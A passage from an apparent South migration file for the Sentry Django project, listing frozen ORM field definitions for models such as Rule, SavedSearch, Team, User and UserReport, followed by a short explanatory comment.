('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '200'
}),
'organization_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
)
},
'sentry.rule': {
'Meta': {
'object_name': 'Rule'
},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'label': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
)
},
'sentry.savedsearch': {
'Meta': {
'unique_together': "(('project', 'name'),)",
'object_name': 'SavedSearch'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_default': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'query': ('django.db.models.fields.TextField', [], {})
},
'sentry.savedsearchuserdefault': {
'Meta': {
'unique_together': "(('project', 'user'),)",
'object_name': 'SavedSearchUserDefault',
'db_table': "'sentry_savedsearch_userdefault'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'savedsearch': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.SavedSearch']"
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.tagkey': {
'Meta': {
'unique_together': "(('project', 'key'),)",
'object_name': 'TagKey',
'db_table': "'sentry_filterkey'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'label':
('django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'status':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'values_seen':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.tagvalue': {
'Meta': {
'unique_together': "(('project', 'key', 'value'),)",
'object_name': 'TagValue',
'db_table': "'sentry_filtervalue'"
},
'data': (
'sentry.db.models.fields.gzippeddict.GzippedDictField', [], {
'null': 'True',
'blank': 'True'
}
),
'first_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True',
'db_index': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'last_seen': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True',
'db_index': 'True'
}
),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'times_seen':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
}),
'value': ('django.db.models.fields.CharField', [], {
'max_length': '200'
})
},
'sentry.team': {
'Meta': {
'unique_together': "(('organization', 'slug'),)",
'object_name': 'Team'
},
'date_added': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'slug': ('django.db.models.fields.SlugField', [], {
'max_length': '50'
}),
'status':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0'
})
},
'sentry.user': {
'Meta': {
'object_name': 'User',
'db_table': "'auth_user'"
},
'date_joined':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'email':
('django.db.models.fields.EmailField', [], {
'max_length': '75',
'blank': 'True'
}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {
'primary_key': 'True'
}),
'is_active': ('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'is_managed': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'is_password_expired':
('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'is_staff': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'last_login':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'last_password_change': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'name': (
'django.db.models.fields.CharField', [], {
'max_length': '200',
'db_column': "'first_name'",
'blank': 'True'
}
),
'password': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'username':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '128'
})
},
'sentry.useravatar': {
'Meta': {
'object_name': 'UserAvatar'
},
'avatar_type':
('django.db.models.fields.PositiveSmallIntegerField', [], {
'default': '0'
}),
'file': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.File']",
'unique': 'True',
'null': 'True',
'on_delete': 'models.SET_NULL'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident': (
'django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '32',
'db_index': 'True'
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'avatar'",
'unique': 'True',
'to': "orm['sentry.User']"
}
)
},
'sentry.useremail': {
'Meta': {
'unique_together': "(('user', 'email'),)",
'object_name': 'UserEmail'
},
'date_hash_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'email': ('django.db.models.fields.EmailField', [], {
'max_length': '75'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_verified': ('django.db.models.fields.BooleanField', [], {
'default': 'False'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'emails'",
'to': "orm['sentry.User']"
}
),
'validation_hash': (
'django.db.models.fields.CharField', [], {
'default': "u'M3q5J1slH8D6cKCdQ80XjNpgY9lanKSB'",
'max_length': '32'
}
)
},
'sentry.useroption': {
'Meta': {
'unique_together': "(('user', 'project', 'key'),)",
'object_name': 'UserOption'
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'null': 'True'
}
),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.userreport': {
'Meta': {
'unique_together': "(('project', 'event_id'),)",
'object_name': 'UserReport',
'index_together': "(('project', 'event_id'), ('project', 'date_added'))"
},
'comments': ('django.db.models.fields.TextField', [], {}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'email': ('django.db.models.fields.EmailField', [], {
'max_length': '75'
}),
'event_id': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
)
}
}
complete_apps = ['sentry']
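# Illustrative sketch only (not part of the generated migration): each entry in
# the frozen ``models`` dict above describes one field as a triple of
# (field class path, positional args, keyword args serialized as strings).
# South uses this snapshot purely to reconstruct the ORM state at this point in
# the migration history. As a hypothetical reading, the 'sentry.projectoption'
# entry corresponds roughly to a model declared like:
#
#     class ProjectOption(Model):
#         project = FlexibleForeignKey('sentry.Project')
#         key = models.CharField(max_length=64)
#         value = UnicodePickledObjectField()
#
#         class Meta:
#             unique_together = (('project', 'key'),)
#             db_table = 'sentry_projectoptions'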